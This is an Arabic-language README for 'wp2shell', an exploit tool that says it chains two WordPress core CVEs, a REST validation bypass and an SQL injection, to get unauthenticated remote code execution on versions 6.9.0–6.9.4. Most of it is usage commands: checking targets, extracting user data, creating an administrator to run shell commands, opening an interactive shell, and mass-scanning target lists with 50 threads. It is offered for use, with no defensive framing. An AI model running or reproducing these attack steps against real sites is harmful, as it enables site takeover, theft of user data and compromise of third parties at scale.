wp2shell - WordPress RCE PoC (CVE-2026-63030 + CVE-2026-60137)
تنفيذ أوامر عن بُعد غير مصادق عليه في نواة ووردبريس
بواسطة: JohenLastGen
📌 نظرة عامة
تقوم هذه الأداة بربط ثغرتين أمنيتين حاسمتين في ووردبريس لتحقيق تنفيذ أوامر عن بُعد غير مصادق:
| الثغرة | CVE | الوصف |
|---|
| التوجيه الخاطئ للسُبل المجمّعة في REST | CVE-2026-63030 | تجاوز التحقق، تهريب حمولة SQLi |
| حقن SQL عبر author__not_in في WP_Query | CVE-2026-60137 | حقن سلسلة نصية خام → تنفيذ SQL |
التأثير: مهاجم غير مصادق → إنشاء مدير → تنفيذ الأوامر
🎯 الإصدارات المتأثرة
| نطاق الإصدار | الحالة |
|---|
| ووردبريس 6.9.0 - 6.9.4 | ✅ قابل للاختراق (سلسلة RCE كاملة) |
|
🚀 بداية سريعة
#خيارات:
-h, --help عرض رسالة المساعدة والخروج
python3 wp2shell.py --help
# 1. التحقق مما إذا كان الهدف قابلًا للاختراق
python3 wp2shell.py check https://target.com
# 2. استخراج البيانات (بصمة/مستخدمين)
python3 wp2shell.py read https://target.com --preset fingerprint
python2 wp2shell.py read https://target.com --preset users
# 3. RCE - إنشاء مدير وتنفيذ أمر (لا حاجة لبيانات اعتماد!)
python3 wp2shell.py shell https://target.com --cmd "id"
# 4. شل تفاعلي
python3 wp2shell.py shell https://target.com --interactive
# 5. مسح جماعي لأهداف متعددة
python3 wp2shell.py scan targets.txt --threads 50 --prove --json results.json